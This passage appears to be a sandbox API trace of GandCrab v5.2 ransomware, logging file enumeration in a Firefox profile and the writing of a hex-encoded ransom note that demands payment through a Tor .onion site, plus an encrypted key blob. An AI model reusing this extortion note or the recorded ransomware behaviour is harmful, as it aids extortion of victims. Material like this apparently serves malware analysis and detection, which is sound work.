5\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0084.814] WriteFile (in: hFile=0x2e0, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259ddd4, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259ddd4*=0x2162, lpOverlapped=0x0) returned 1 [0084.815] CloseHandle (hObject=0x2e0) returned 1 [0084.815] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.815] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0084.816] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x1e, wMilliseconds=0x88)) [0084.816] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0084.816] GetWindowsDirectoryW (in: lpBuffer=0x2410000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0084.816] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2410200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2410600, lpMaximumComponentLength=0x2410608, lpFileSystemFlags=0x2410604, lpFileSystemNameBuffer=0x2410400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2410600*=0xd2ca4def, lpMaximumComponentLength=0x2410608*=0xff, lpFileSystemFlags=0x2410604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0084.816] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\d2ca4a09d2ca4deb61a.lock") returned 146 [0084.816] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2e0 [0084.817] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.817] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.817] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\") returned 122 [0084.817] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\*" [0084.817] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\*", fInfoLevelId=0x1, lpFindFileData=0x259ddf0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259ddf0) returned 0x503378 [0084.817] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.817] FindNextFileW (in: hFindFile=0x503378, lpFindFileData=0x259ddf0 | out: lpFindFileData=0x259ddf0) returned 1 [0084.818] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.818] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.818] FindNextFileW (in: hFindFile=0x503378, lpFindFileData=0x259ddf0 | out: lpFindFileData=0x259ddf0) returned 1 [0084.818] lstrcmpW (lpString1="818200132aebmoouht.files", lpString2=".") returned 1 [0084.818] lstrcmpW (lpString1="818200132aebmoouht.files", lpString2="..") returned 1 [0084.818] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\", lpString2="818200132aebmoouht.files" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files" [0084.818] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\" [0084.818] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0084.819] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0084.819] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0084.819] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0084.819] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0084.819] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0084.819] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0084.819] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0084.819] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0084.819] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.820] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0084.820] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\\\TITWMVJL-DECRYPT.txt") returned 168 [0084.820] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e8 [0084.821] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41